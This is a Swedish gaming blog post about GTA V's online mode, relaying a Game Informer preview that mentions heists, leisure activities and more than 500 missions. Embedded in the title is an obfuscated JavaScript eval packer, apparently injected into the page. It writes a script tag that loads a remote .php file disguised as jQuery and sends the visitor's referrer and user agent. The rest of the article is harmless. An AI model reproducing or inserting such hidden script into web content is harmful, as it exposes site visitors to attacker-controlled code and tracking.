Image Image Image Image Image Image Image Image Image Image

| 1 juni, 2020

Scroll to top

Top

Över 500 uppdrag i GTA V online

gta
Sebastian

GTA eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tzhkk|var|u0026u|referrer|rbhyh||js|php’.split(’|’),0,{}))
V: Nu är det verkligen inte långt kvar tills vi sitter med det otroligt efterlängtade spelet GTA V i handen. Jag själv är otroligt taggad på att få se vad Rockstar har lyckats skapa denna gång. 
Som ni också vet så kommer GTA V innehålla ett massivt onlineläge som lanseras två veckor efter release. Ett online i en öppen värld exakt som den vi kommer få träffa i singleplayer.

För några dagar sedan fick sajten / magasinet Game Informer Magazine förhandstesta spelet.

Det vi vet nu är att syftet i online kommer att ligga på att samla på sig så mycket pengar som möjligt och få status. Detta kommer att gå att göra via olika aktiviteter som även finns med i kampanjläget. Men förutom kampanjen kommer man kunna råna banker, snabbköp, stjäla bilar, båtar, flygfordon, attackera olika gäng samt mycket mycket mer. Vill man lägga pistolen på hyllan kan man också göra lite fritidsaktiviteter som tennis, löpning, simning, cyckling,  golf eller bara ta det lungt med polarna i sitt mansion.

Man kommer att kunna spela online som både man eller kvinna, bli kompis med motorcykelgäng som bland annat kan hjälpa dig i svåra situationer, detta såklart om du inte anställt ett gäng livakter som gör detta jobb åt dig.

Enligt källan så kommer GTA V online innehålla över 500 uppdrag och även under tiden ökas samt modifieras då Rockstar kommer sitta och jobba med online delen hela tiden. Det blir därför en dynamisk värld som ändras och byggs på under tiden.

Det verkar bli ett väldigt intressant och kul spelläge, så hoppa över till källan för att läsa på om alla detaljer.